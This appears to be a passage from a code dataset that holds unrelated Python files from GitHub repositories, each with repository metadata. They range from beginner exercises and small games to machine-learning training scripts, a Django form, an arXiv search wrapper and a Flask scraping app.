\"__main__\":\n socket_connect()\n Thread(target=receiver).start()\n Thread(target=concurrent).start()\n while True:\n message = input()\n socket_send(message)\n client_socket.close()\n","repo_name":"wkdguswo16/project_local","sub_path":"serversocket.py","file_name":"serversocket.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15485145391","text":"#Este é um projeto simples que calcula a média nacional das temperaturas ao longo dos meses e identifica quais meses tiveram temperaturas acima dessa média\n# Esse projeto pode ser utilizado como exemplo para entender o uso de listas, loops e condicionais em Python.\nmeses = [\n 'Janeiro',\n 'Fevereiro',\n 'Março',\n 'Abril',\n 'Maio',\n 'Junho',\n 'Julho',\n 'Agosto',\n 'Setembro',\n 'Outubro',\n 'Novembro',\n 'Dezembro'\n]\n\ntemperaturas = [30, 29, 28, 28, 25, 26, 20, 21, 19, 25, 27, 32]\n\n\nmedia_nacional = sum(temperaturas)/len(temperaturas)\nprint(f'A média nacional é de {media_nacional:.1f} graus.')\nmeses_acima = []\nfor i, qtde in enumerate(meses):\n #print(meses[i], temperaturas[i])\n if temperaturas[i] > media_nacional:\n meses_acima.append(qtde)\n#print(meses_acima)\nprint(f'Os meses com a temperatura acima da média foram: {meses_acima}')","repo_name":"SoeCode/mini_projetos","sub_path":"temperatura_meses.py","file_name":"temperatura_meses.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30177425121","text":"import numpy as np\n\n\"\"\"\nContains preprocessing code for creating additional information based on MRI volumes and true segmentation maps (asegs).\nEg. weight masks for median frequency class weighing, edge weighing etc.\n\"\"\"\n\ndef create_weight_mask(aseg):\n \"\"\"\n Main function for calculating weight mask of segmentation map for loss function. Currently only Median Frequency\n Weighing is implemented. Other types can be additively added to the 'weights' variable\n\n Args:\n aseg (numpy.ndarray): Segmentation map with shape l x w x d\n\n Returns:\n numpy.ndarray: Weight Mask of same shape as aseg\n \"\"\"\n if len(aseg.shape)==4:\n _, h,w,d = aseg.shape\n elif len(aseg.shape)==3:\n h,w,d = aseg.shape\n\n weights = np.zeros((h,w,d), dtype=float) # Container ndarray of zeros for weights\n\n weights += median_freq_class_weighing(aseg) # Add median frequency weights\n\n # Further weights (eg. extra weights for region borders) can be added here\n # Eg. weights += edge_weights(aseg)\n\n return weights\n\n\ndef median_freq_class_weighing(aseg):\n \"\"\"\n Median Frequency Weighing. Guarded against class absence of certain classes.\n\n Args:\n aseg (numpy.ndarray): Segmentation map with shape l x w x d\n\n Returns:\n numpy.ndarray: Median frequency weighted mask of same shape as aseg\n \"\"\"\n\n # Calculates median frequency based weighing for classes\n unique, counts = np.unique(aseg, return_counts=True)\n if len(aseg.shape)==4:\n _, h,w,d = aseg.shape\n elif len(aseg.shape)==3:\n h,w,d = aseg.shape\n\n class_wise_weights = np.median(counts)/counts\n aseg = aseg.astype(int)\n\n # Guards against the absence of certain classes in sample\n discon_guard_lut = np.zeros(int(max(unique))+1)-1\n for idx, val in enumerate(unique):\n discon_guard_lut[int(val)] = idx\n\n discon_guard_lut = discon_guard_lut.astype(int)\n\n # Assigns weights to w_mask and resets the missing classes\n w_mask = np.reshape(class_wise_weights[discon_guard_lut[aseg.ravel()]], (h, w, d))\n return w_mask\n\n\n# Label mapping functions (to aparc (eval) and to label (train))\ndef map_label2aparc_aseg(mapped_aseg):\n \"\"\"\n Function to perform look-up table mapping from label space to aparc.DKTatlas+aseg space\n :param np.ndarray mapped_aseg: label space segmentation (aparc.DKTatlas + aseg)\n :return:\n \"\"\"\n aseg = np.zeros_like(mapped_aseg)\n labels = np.array([0, 2, 4, 5, 7, 8, 10, 11, 12, 13, 14,\n 15, 16, 17, 18, 24, 26, 28, 31, 41, 43, 44,\n 46, 47, 49, 50, 51, 52, 53, 54, 58, 60, 63,\n 77, 1002, 1003, 1005, 1006, 1007, 1008, 1009, 1010, 1011,\n 1012, 1013, 1014, 1015, 1016, 1017, 1018, 1019, 1020, 1021, 1022,\n 1023, 1024, 1025, 1026, 1027, 1028, 1029, 1030, 1031, 1034, 1035,\n 2002, 2005, 2010, 2012, 2013, 2014, 2016, 2017, 2021, 2022, 2023,\n 2024, 2025, 2028])\n h, w, d = aseg.shape\n\n aseg = labels[mapped_aseg.ravel()]\n\n aseg = aseg.reshape((h, w, d))\n\n return aseg\n\n\n# if __name__ == \"__main__\":\n# #a = np.random.randint(0, 5, size=(10,10,10))\n# #b = np.random.randint(5, 10, size=(10000))\n#\n# #map_masks_into_5_classes(np.random.randint(0, 250, size=(256, 256, 256)))\n#\n# import nibabel as nib\n# from data_utils.process_mgz_into_hdf5 import map_aparc_aseg2label, map_aseg2label\n# path = r\"abide_ii/sub-28675/mri/aparc.DKTatlas+aseg.mgz\"\n# aseg = nib.load(path).get_data()\n# labels_full, _ = map_aparc_aseg2label(aseg) # only for 79 classes case\n# # labels_full, _ = map_aseg2label(aseg) # only for 37 classes case\n# aseg = labels_full\n# # print(aseg.shape)\n# median_freq_class_weighing(aseg)\n# # print(edge_weighing(aseg, 1.5))\n","repo_name":"Deep-MI/3d-neuro-seg","sub_path":"utils/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"5787568960","text":"from django import forms\nfrom django.core.exceptions import ValidationError\n\nfrom . import models\n\n\nclass EntryForm(forms.ModelForm):\n\n # def __init__(self, *args, **kwargs):\n # self.user = kwargs.pop('user', None)\n # super(EntryForm, self).__init__(*args, **kwargs)\n #\n # def clean_phone_number(self):\n # c = self.cleaned_data['phone_number']\n # if models.Entry.objects.filter(user=self.user).exists():\n # raise ValidationError('error')\n # return c\n\n class Meta:\n model = models.Entry\n fields = (\n 'name',\n 'last_name',\n 'phone_number',\n )\n","repo_name":"pouria-azizi/Phonebook-Project","sub_path":"phonebook/phones/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"5100548414","text":"import os\nimport torch\nfrom visdom import Visdom\nfrom util import loadYaml, parseArgs\nfrom network.UNet import ScaleUNet\nfrom dataset.gopro import GoProDataset\nfrom torch.utils.data import DataLoader\nfrom torch.optim import lr_scheduler\nimport dataset.util as util\n\n\nargs = parseArgs()\nconfig, saveName = loadYaml(args.config)\n\nos.environ['CUDA_VISIBLE_DEVICES'] = config['gpu_available']\ndevice_ids = range(config['gpu_num'])\n\ndef print_model(model):\n for n, p in model.named_parameters():\n print(n, p.shape)\n\ndef trainScaledUNet():\n trainSet = GoProDataset(sharp_root=config['train_sharp'], blur_root=config['train_blur'],\n resize_size=config['resize_size'], patch_size=config['crop_size'],\n phase='train')\n testSet = GoProDataset(sharp_root=config['test_sharp'], blur_root=config['test_blur'],\n resize_size=config['resize_size'], patch_size=config['crop_size'],\n phase='test')\n\n train_loader = DataLoader(trainSet,\n batch_size=config['batchsize'],\n shuffle=True, num_workers=4,\n drop_last=True, pin_memory=True)\n test_loader = DataLoader(testSet, batch_size=1,\n shuffle=False, num_workers=1,\n drop_last=False, pin_memory=True)\n su, sd = config['scaleup'],config['scaledown']\n scale_ration = 13/16 \n model = ScaleUNet(3, 3, su, sd)\n model = torch.nn.DataParallel(model.cuda(), device_ids=device_ids)\n print_model(model)\n\n if config['pretrained_model'] != 'None':\n print('loading Pretrained {}'.format(config['pretrained_model']))\n model.load_state_dict(torch.load(config['pretrained_model']))\n\n startEpoch = config['start_epoch']\n optimizer = torch.optim.Adam(model.parameters(), lr=config['lr'])\n scheduler = lr_scheduler.MultiStepLR(optimizer, milestones=config['step'], gamma=0.5) # learning rates\n\n mse = torch.nn.L1Loss()\n viz = Visdom(env=saveName)\n bestPSNR = config['bestPSNR']\n\n for epoch in range(startEpoch, 1000000):\n avg_loss = 0.0\n idx = 0\n model.train()\n for i, train_data in enumerate(train_loader):\n idx += 1\n train_data['L'] = train_data['L'].cuda()\n train_data['H'] = train_data['H'].cuda()\n optimizer.zero_grad()\n sharp = model(train_data['L'])\n loss = mse(sharp, train_data['H'])\n loss.backward()\n optimizer.step()\n\n avg_loss += loss.item()\n if idx % 100 == 0:\n print(\"epoch {}: trained {}\".format(epoch, idx))\n\n scheduler.step()\n avg_loss = avg_loss / idx\n print(\"epoch {}: total loss : {:<7.5f}, lr : {}\".format(\n epoch, avg_loss, scheduler.get_lr()[0]))\n viz.line(\n X=[epoch],\n Y=[avg_loss],\n win='{}/{}UNettrainMSELoss'.format(su, sd),\n opts=dict(title='mse', legend=['train_mse']),\n update='append')\n\n if epoch % config['save_epoch'] == 0:\n with torch.no_grad():\n model.eval()\n avg_PSNR = 0\n idx = 0\n for test_data in test_loader:\n idx += 1\n test_data['L'] = test_data['L'].cuda()\n sharp = model(test_data['L'])\n sharp = sharp.detach().float().cpu()\n sharp = util.tensor2uint(sharp)\n test_data['H'] = util.tensor2uint(test_data['H'])\n current_psnr = util.calculate_psnr(sharp, test_data['H'], border=0)\n\n avg_PSNR += current_psnr\n if idx % 100 == 0:\n print(\"epoch {}: tested {}\".format(epoch, idx))\n avg_PSNR = avg_PSNR / idx\n print(\"total PSNR : {:<7.5f}\".format(\n avg_PSNR))\n viz.line(\n X=[epoch],\n Y=[avg_PSNR],\n win='{}/{}UNettestPSNR'.format(su, sd),\n opts=dict(title='psnr', legend=['valid_psnr']),\n update='append')\n if avg_PSNR > bestPSNR:\n bestPSNR = avg_PSNR\n save_path = os.path.join(config['model_dir'], \"{}_{}UNet\".format(su,sd) + config['modelName'])\n if not os.path.exists(config['model_dir']):\n os.mkdir(config['model_dir'])\n torch.save(model.state_dict(), save_path)\n\n\nif __name__ == '__main__':\n trainScaledUNet()\n","repo_name":"HugoAhoy/UNet-Pruning-on-Deblur","sub_path":"ScaledNet/trainScaledUNet.py","file_name":"trainScaledUNet.py","file_ext":"py","file_size_in_byte":4680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43462224010","text":"from gamedata import data\r\nimport random\r\nfrom art import logo, vs\r\n\r\n\r\n\r\n\r\n\r\n\r\nfinish = True\r\n\r\npoint = 0\r\n\r\nfirst = random.choice(data)\r\nprint(logo)\r\n\r\n\r\n\r\nwhile finish != False:\r\n second = random.choice(data)\r\n print(first['follower_count'])\r\n print(second['follower_count'])\r\n print(\"*****************\")\r\n print(\"Compera A: \"+first['name']+\",\"+first['description'])\r\n print(vs)\r\n print(\"Compare B: \"+second['name']+\",\"+second['description'])\r\n a = input(\"make a chocie\")\r\n\r\n if a == \"A\":\r\n if first['follower_count'] > second['follower_count']:\r\n point += 1\r\n first = second\r\n else:\r\n finish=False\r\n print(f\"You lost your point is {point}\")\r\n else:\r\n if second['follower_count'] > first['follower_count']:\r\n point += 1\r\n first = second\r\n else:\r\n finish=False\r\n print( f\"You lost your point is {point}\")\r\n","repo_name":"krakeklan/Higher-Lower-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33102337297","text":"v1 = int(input('primeiro valor: '))\r\nv2 = int(input('segundo: '))\r\nv3 = int(input('terceiro: '))\r\nmaior = v1\r\nif v1 > maior:\r\n maior = v1\r\n\r\nif v2 > maior:\r\n maior = v2\r\nif v3 > maior:\r\n maior = v3\r\nprint('Maior: ',maior)\r\n\r\nmenor = v1\r\nif v1 < menor:\r\n menor = v1\r\nif v2 < menor:\r\n menor = v2\r\nif v3 < menor:\r\n menor = v3\r\n print('Menor: ', menor)","repo_name":"joao2dev/python","sub_path":"exercicios python/ex033.py","file_name":"ex033.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4055972991","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nindexdatas = pd.date_range(\"20191127\", periods=6)\r\ndf = pd.DataFrame(np.arange(24).reshape((6, 4)), index=indexdatas, columns=['A', 'B', 'C', 'D'])\r\n\r\ndf.iloc[0, 1] = np.nan\r\ndf.iloc[1, 2] = np.nan # numpy中的NAN是一个常数,代表空值\r\nprint(df.dropna(axis=0, how='any')) # 对行进行删除 'any': 只要存在 NaN 就 drop 掉; 'all': 必须全部是 NaN 才 drop\r\nprint(df.fillna(value=0)) # 将表格中的NAN用0替代\r\n\"\"\" 以上两个函数都没有修改表格本身 \"\"\"\r\nprint(df.isnull()) # 输出一个bool型表格, nan所在位置为True, 其他地方都是False\r\nprint(np.any(df.isnull())) # 返回一个bool型 判断表格中是否有一个nan值\r\n","repo_name":"Max6411/Python_","sub_path":"Pandas-4-Handling missing data.py","file_name":"Pandas-4-Handling missing data.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43237541759","text":"\"\"\"\nMódulo que contiene la implementación de la clase ArxivAPI, que permite realizar búsquedas en el repositorio de artículos científicos arXiv.\n\nLa clase ArxivAPI implementa la interfaz APIExtraction y proporciona los siguientes métodos públicos:\n- is_valid_search_type(search_type): verifica si un tipo de búsqueda es válido.\n- construct_query(queries, search_types, operators): construye una consulta a partir de una lista de términos de búsqueda, tipos de búsqueda y operadores.\n- search(queries, search_types, operators=None): realiza una búsqueda en arXiv a partir de una lista de términos de búsqueda, tipos de búsqueda y operadores.\n- search_multiple_terms(terms): realiza una búsqueda en arXiv a partir de una lista de términos de búsqueda, combinando los resultados.\n- is_valid_sort_value(value): verifica si un valor de ordenación es válido.\n\nAdemás, el módulo define las siguientes clases:\n- APIResponse: clase base para las respuestas de la API.\n- APISuccessResponse(APIResponse): clase para las respuestas exitosas de la API.\n- APIErrorResponse(APIResponse): clase para las respuestas de error de la API.\n\"\"\"\n\nfrom typing import List, Union\nimport urllib.parse\nimport urllib.request\nimport feedparser\nfrom infrastructure.api_abstract import APIExtraction\nfrom models.api_model import APIResponse, APISuccessResponse, APIErrorResponse\nfrom models.paper_model import ArticleMetadata\n\nclass ArxivAPI(APIExtraction):\n \"\"\"\n Clase que representa una API para extraer información de artículos científicos de arXiv.\n\n Atributos:\n ----------\n BASE_URL : str\n URL base de la API.\n valid_search_types : List[str]\n Lista de tipos de búsqueda válidos.\n max_results : int\n Número máximo de resultados a obtener por búsqueda.\n \"\"\"\n\n BASE_URL = (\"http://export.arxiv.org/api/query?\"\n \"search_query={}&sortBy=lastUpdatedDate&sortOrder=ascending&max_results={}\")\n valid_search_types = [\"ti\", \"au\", \"abs\", \"co\", \"jr\", \"cat\", \"rn\", \"id\", \"all\"]\n\n def __init__(self, max_results=10):\n self.max_results = max_results\n\n def is_valid_search_type(self, search_type):\n \"\"\"_summary_\n Verifica si el tipo de búsqueda proporcionado es válido.\n\n Parámetros:\n -----------\n search_type : str\n Tipo de búsqueda a verificar.\n\n Retorna:\n --------\n bool\n True si el tipo de búsqueda es válido, False en caso contrario.\n \"\"\"\n return search_type in self.valid_search_types\n\n def construct_query(self, queries, search_types, operators):\n \"\"\"_summary_\n Construye una consulta para la API de arXiv a partir de las consultas, tipos de búsqueda y operadores proporcionados.\n\n Parámetros:\n -----------\n queries : List[str]\n Lista de consultas a realizar.\n search_types : List[str]\n Lista de tipos de búsqueda correspondientes a cada consulta.\n operators : List[str]\n Lista de operadores a utilizar entre cada consulta.\n\n Retorna:\n --------\n str\n Consulta construida a partir de las consultas, tipos e búsqueda y operadores proporcionados.\n \"\"\"\n if not all([self.is_valid_search_type(st) for st in search_types]):\n raise ValueError(\"Invalid search type provided.\")\n queries = [q.lower() for q in queries]\n search_types = [st.lower() for st in search_types]\n combined_queries = []\n for i, (query, search_type) in enumerate(zip(queries, search_types)):\n combined_query = \"{}:{}\".format(search_type, query)\n combined_queries.append(combined_query)\n if i < len(queries) - 1:\n combined_queries.append(operators[i])\n return '+'.join(combined_queries)\n\n def search(self, queries, search_types, operators=None) -> APIResponse:\n \"\"\"_summary_\n Realiza una búsqueda en la API de arXiv y devuelve una respuesta de la API con la información de los artículos encontrados.\n\n Parámetros:\n -----------\n queries : List[str]\n Lista de consultas a realizar.\n search_types : List[str]\n Lista de tipos de búsqueda correspondientes a cada consulta.\n operators : Optional[List[str]], default=None\n Lista de operadores a utilizar entre cada consulta. Si no se proporciona, se utiliza \"AND\" como operador por defecto.\n\n Retorna:\n --------\n APIResponse\n Respuesta de la API con la información de los artículos encontrados.\n \"\"\"\n if operators is None:\n operators = [\"AND\"] * (len(queries) - 1)\n try:\n constructed_query = self.construct_query(queries, search_types, operators)\n url = self.BASE_URL.format(constructed_query, self.max_results)\n response = urllib.request.urlopen(url)\n feed = feedparser.parse(response.read().decode('utf-8'))\n articles = []\n for entry in feed.entries:\n articles.append(ArticleMetadata(\n entry.title, \n entry.summary, \n entry.published, \n entry.link\n ))\n return APISuccessResponse(data=articles)\n except Exception as e:\n return APIErrorResponse(error_message=str(e))\n\n def search_multiple_terms(self, terms) -> Union[APISuccessResponse, APIErrorResponse]:\n \"\"\"_summary_\n Realiza una búsqueda en la API de arXiv para cada término proporcionado y devuelve una lista de respuestas de la API con la información de los artículos encontrados.\n\n Parámetros:\n -----------\n terms : List[str]\n Lista de términos a buscar.\n\n Retorna:\n --------\n Union[List[APIResponse], APIErrorResponse]\n Lista de respuestas de la API con la información de los artículos encontrados, o una respuesta de error si no se encontraron resultados para ningún término.\n \"\"\"\n combined_articles = []\n for term in terms:\n response = self.search([term], [\"all\"])\n if isinstance(response, APISuccessResponse):\n combined_articles.extend(response.data)\n if combined_articles:\n return APISuccessResponse(data=combined_articles)\n else:\n return APIErrorResponse(error_message=\"No results found for any term.\")\n def is_valid_sort_value(self, value) -> bool:\n pass\n\n\nif __name__ == \"__main__\":\n api = ArxivAPI(max_results=20)\n results_combined = api.search([\"Rovs\", \"AUV\"], [\"all\", \"all\"], [\"OR\"])\n if isinstance(results_combined, APISuccessResponse):\n for paper in results_combined.data:\n print(paper)\n else:\n print(f\"Error: {results_combined.error_message}\")","repo_name":"tadeusER/botpaper","sub_path":"src/service/service_arxiv.py","file_name":"service_arxiv.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70017491090","text":"import pygame\r\nimport pygame.gfxdraw\r\n\r\npygame.init()\r\n\r\nwin = pygame.display.set_mode((500, 400))\r\npygame.display.set_caption('Pause Button')\r\n\r\n\r\nclass Pause:\r\n\r\n def __init__(self, pos, win):\r\n self.pos = pos\r\n self.x = self.pos[0]\r\n self.y = self.pos[1]\r\n self.radius = 50\r\n self.win = win\r\n\r\n def draw(self):\r\n pygame.draw.circle(self.win, (0, 0, 0),\r\n center=self.pos, radius=self.radius, width=5)\r\n pygame.draw.line(self.win, (0, 0, 0), (self.x - self.radius/3, self.y - self.radius//1.5 ), (self.x - self.radius/3, self.y + self.radius//1.5 ),\r\n width=3)\r\n pygame.draw.line(self.win, (0, 0, 0), (self.x + self.radius/3, self.y - self.radius//1.5 ), (self.x + self.radius/3, self.y + self.radius//1.5 ),\r\n width=3)\r\n\r\nif __name__ == '__main__':\r\n\r\n pauseButton = Pause((200, 200), win)\r\n\r\n run = True\r\n while run:\r\n events = pygame.event.get()\r\n for event in events:\r\n if event.type == pygame.QUIT:\r\n run = False\r\n\r\n win.fill((255, 255, 255))\r\n #pygame.gfxdraw.aacircle(win, 100, 100, 15, (0,0,0))\r\n pauseButton.draw()\r\n pygame.display.flip()\r\n\r\n\r\n pygame.quit()\r\n","repo_name":"Y0shicon/Collision-Simulator","sub_path":"Tests/pauseButton.py","file_name":"pauseButton.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28470558113","text":"answer = []\nvisit = []\ndef can(x,y,move,places):\n global answer, visit\n dx = [0,1,0,-1]\n dy = [1,0,-1,0]\n visit[x][y] = False\n if move == 2:\n return\n for i, j in zip(dx, dy):\n if x+i >= 0 and y+j >= 0 and x+i<5 and y+j<5 and places[x+i][y+j] != 'X' and visit[x+i][y+j]:\n if places[x+i][y+j] == 'P':\n #print(x+i,y+j,move)\n answer.append(1)\n return\n can(x+i,y+j,move+1,places)\n return\n\ndef solution(places):\n global answer, visit\n ans = []\n for q in range(len(places)):\n for w in range(5):\n for e in range(5):\n if places[q][w][e] == 'P':\n visit = [[True] * 5 for _ in range(5)]\n #print('visit')\n can(w,e,0,places[q])\n if sum(answer) == 0:\n ans.append(1)\n else:\n ans.append(0)\n answer = []\n return ans\n\n\nprint(solution([[\"POOOP\", \"OXXOX\", \"OPXPX\", \"OOXOX\", \"POXXP\"], [\"POOPX\", \"OXPXP\", \"PXXXO\", \"OXXXO\", \"OOOPP\"], [\"PXOPX\", \"OXOXP\", \"OXPXX\", \"OXXXP\", \"POOXX\"], [\"OOOXX\", \"XOOOX\", \"OOOXX\", \"OXOOX\", \"OOOOO\"], [\"PXPXP\", \"XPXPX\", \"PXPXP\", \"XPXPX\", \"PXPXP\"]]))","repo_name":"elves37/Algorithm","sub_path":"차근차근/24DFS와BFS/asd.py","file_name":"asd.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33871349265","text":"class CookieWork:\n def __init__(self):\n pass\n\n def formatCookie(coo):\n cookieSplit = coo.split(';')\n properCookie = {}\n for i in cookieSplit:\n newI = (i.replace('=', ':', 1)).replace(' ', '')\n reSplitter = (newI.split(':', 1))\n properCookie[reSplitter[0]] = reSplitter[1]\n return properCookie\n\n # sends a dict of cookies into a file to allow you to play around with cookies, remove cookies and see what works\n def intoFile(coo, file):\n try:\n with open(file, 'w') as f:\n for i in coo:\n f.write('{}: {}'.format(i, coo[i]))\n f.write('\\n')\n except FileNotFoundError:\n print('Error Opening File')\n except:\n print('Error')\n\n # takes in a text file of headers, formats them into a key:value pairing\n def readFile(file):\n with open(file) as f:\n header_list = []\n for line in f:\n header_list.append((line.strip('\\n')).replace(':', ''))\n\n data_dict = {header_list[i]: header_list[i + 1] for i in range(0, len(header_list), 2)}\n\n return data_dict\n\n # redirects to read file for headers\n def get_headers(file):\n return CookieWork.readFile(file)\n\n # redirects to read file for cookies\n def get_cookie(file):\n return CookieWork.readFile(file)\n\n # outdated, takes in old format of headers\n def get_headers2(file):\n headers = {}\n with open(file) as f:\n\n for line in f:\n # if line.count(':') > 1:\n # line = line.replace(':', '', 1)\n trying = line.split(' ')\n if trying[0].count(':') > 1:\n line = line.replace(':', '', 1)\n\n line = (line.strip('\\n'))\n line = line.split(':', 1)\n line[1] = line[1].strip(' ')\n headers[line[0]] = line[1]\n\n return headers\n","repo_name":"joshbeyerr/webformat","sub_path":"cookiework.py","file_name":"cookiework.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"30884835873","text":"from flask import Flask, render_template, redirect\nfrom flask_pymongo import PyMongo\nimport scrape_mars\n\n\n# Create an instance of Flask\napp = Flask(__name__)\n\n\n# Use PyMongo to establish Mongo connection\nmongo = PyMongo(app, uri=\"mongodb://localhost:27017/mars_hw\")\n\n\n\n@app.route('/')\ndef home():\n\n\n # Find one record of data from the mongo database\n destination_data = mongo.db.collection.find_one()\n\n # Return template and data\n return render_template(\"index.html\", listings=destination_data)\n\n\n@app.route(\"/scrape\")\ndef scrape():\n\n\t#Store the return value in Mongo as a Python dictionary.\n\n\t# Run the scrape function\n mars_data = scrape_mars.scrape_info()\n\n # Update the Mongo database using update and upsert=True\n mongo.db.collection.update({}, mars_data, upsert=True) #This will push to the mongodb. \n #The update function will update if the collection does not exist or it will overwrite it\n\n # Redirect back to home page\n return redirect(\"/\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Bandelero/web-scraping-challenge","sub_path":"Mission_to_Mars/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17842481085","text":"import segmentation_models as sm\nimport config as cfg\nimport numpy as np\n\nclass Food_Segmentation_model():\n\n def __init__(self):\n \n self.model = sm.Unet(cfg.seg_model['BACKBONE'], classes=cfg.seg_model['classes'], activation=cfg.seg_model['activation'], encoder_weights=None)\n self.model.load_weights(cfg.seg_model['pretrain-path'])\n\n def predict(self, img):\n y_pred = self.model.predict(np.reshape(img, (1,256,256,3)))\n y_pred = y_pred.squeeze()\n y_pred = y_pred.argmax(axis=2)\n \n return y_pred\n\n def decode_segmap(self, image, nc=7):\n \n label_colors = np.array([(0, 0, 0), # 0=background black\n # 1=rice white, 2=meat brown, 3=egg yellow, 4=vegetable green, 5=beverage blue,6=etc purple\n (255, 255, 255), (153, 76, 0), (255, 255, 0), (102, 255, 102), (0, 0, 255), (255, 102, 255)])\n\n r = np.zeros_like(image).astype(np.uint8)\n g = np.zeros_like(image).astype(np.uint8)\n b = np.zeros_like(image).astype(np.uint8)\n \n for l in range(0, nc):\n idx = image == l\n r[idx] = label_colors[l, 0]\n g[idx] = label_colors[l, 1]\n b[idx] = label_colors[l, 2]\n \n rgb = np.stack([r, g, b], axis=2)\n return rgb","repo_name":"drive087/food_segmentation_API","sub_path":"segmentation_model.py","file_name":"segmentation_model.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"73700827418","text":"import sys\nimport os\n\n#USAGE: FIRST ARG INPUT FILENAME, ALL ZIP FILES WILL BE INSTALLED AFTER UNPACK. ZIP FILE MUST BE NAMED SAME AS THE DIR\ninputFile = sys.argv[1]\nprint('Running: ')\nhexdumpcommand = 'xxd --plain ' + inputFile + ' > tempr.txt'\nos.system(hexdumpcommand)\nfile = open('tempr.txt', 'r')\ndata = file.read()\nclean_data = data.replace('\\n', '')\nfile.close()\nstringg = clean_data.replace('5', 'g').replace('4', 'h').replace('3', 'i').replace('2', 'j').replace('1', 'k').replace('0', 'l').replace('9', 'm').replace('8', 'n').replace('7', 'o').replace('6', 'p')\nexten = inputFile.split('.')\nextend = exten[1]\nprint('Saving: ')\nfileout = str(exten[0]) + '_' + extend + '.DAT'\nwith open(fileout, 'a') as f: f.write(stringg)\nos.system('rm tempr.txt')\nprint('Done: ')\n","repo_name":"crapIBuilt/DAT_file_package_setup","sub_path":"packer.py","file_name":"packer.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3177782227","text":"from yaml import dump, load, BaseLoader, loader\nfrom pathlib import Path\nfrom textwrap import dedent\nfrom dataclasses import dataclass, field\nfrom dataclasses_json import dataclass_json\nimport multihash\nimport json\nfrom dacite import from_dict\nimport sqlite3\nimport sys\n\n\ndir_path = Path.home() / \".gnize\"\nconfig_path = dir_path / \"config.yaml\"\n\n\n@dataclass_json\n@dataclass\nclass Editor:\n use: str\n mode: str\n\n\n@dataclass_json\n@dataclass\nclass CanvasSource:\n use: str\n path: str\n\n\n@dataclass_json\n@dataclass\nclass FingerprintStore:\n use: str\n connect: str\n\n\n@dataclass_json\n@dataclass\nclass Alternation:\n primary: str\n secondary: str\n\n\n@dataclass_json\n@dataclass\nclass Colors:\n gaps: Alternation\n signals: Alternation\n\n\n@dataclass_json\n@dataclass\nclass Runtime:\n debug_log: str\n debug_obj: str\n\n\n@dataclass_json\n@dataclass\nclass Config:\n editor: Editor\n canvasses: CanvasSource\n fingerprints: FingerprintStore\n colors: Colors\n runtime: Runtime\n\n\ndefault_config = from_dict(\n data_class=Config,\n data={\n \"editor\": {\"use\": \"prompttoolkit\", \"mode\": \"vi\"},\n \"canvasses\": {\"use\": \"filesystem\", \"path\": str(dir_path / \"canvasses\")},\n \"fingerprints\": {\n \"use\": \"sqlite3\",\n \"connect\": str(dir_path / \"fingerprints.db\"),\n },\n \"colors\": {\n \"gaps\": {\"primary\": \"#b58900\", \"secondary\": \"#cb4b16\"},\n \"signals\": {\"primary\": \"#2aa198\", \"secondary\": \"#7c81d4\"},\n },\n \"runtime\": {\n \"debug_log\": \"./.gnize.debug.log\",\n \"debug_obj\": \"./.gnize.debug.json\",\n },\n },\n)\n\n\ndef make_or_get():\n \"\"\"\n If the user doesn't have a .gnize dir in their home directory, initialize it\n Otherwise just provide a config summary and return the contents of config.yaml\n \"\"\"\n\n # ~/.gnize\n if not dir_path.exists():\n print(f\"creating {dir_path}\", file=sys.stderr)\n dir_path.mkdir(exist_ok=True, parents=True)\n print(f\"{dir_path} exists\", file=sys.stderr)\n\n # ~/.gnize/config.yaml\n try:\n with open(config_path, \"w\") as f:\n\n config_str = dump(json.loads(default_config.to_json()))\n\n # the json conversion above can be dispensed with, like so:\n # config_str = dump(default_config)\n\n # but then you end up with yaml like this:\n #\n # !!python/object:gnize.dotdir.Config\n # canvasses: !!python/object:gnize.dotdir.CanvasSource\n # path: /home/matt/.gnize/canvasses\n # use: filesystem\n\n f.write(config_str)\n print(f\"{config_path} already exists\", file=sys.stderr)\n config = default_config\n\n except FileNotFoundError:\n with open(config_path, \"r\") as f:\n config_str = f.read()\n print(\"wrote {config_path}\", file=sys.stderr)\n config = load(config_str, Loader=BaseLoader)\n\n # canvasses\n if config.canvasses.use == \"filesystem\":\n canvas_dir = Path(config.canvasses.path)\n canvas_dir.mkdir(parents=True, exist_ok=True)\n count = 0\n for child in 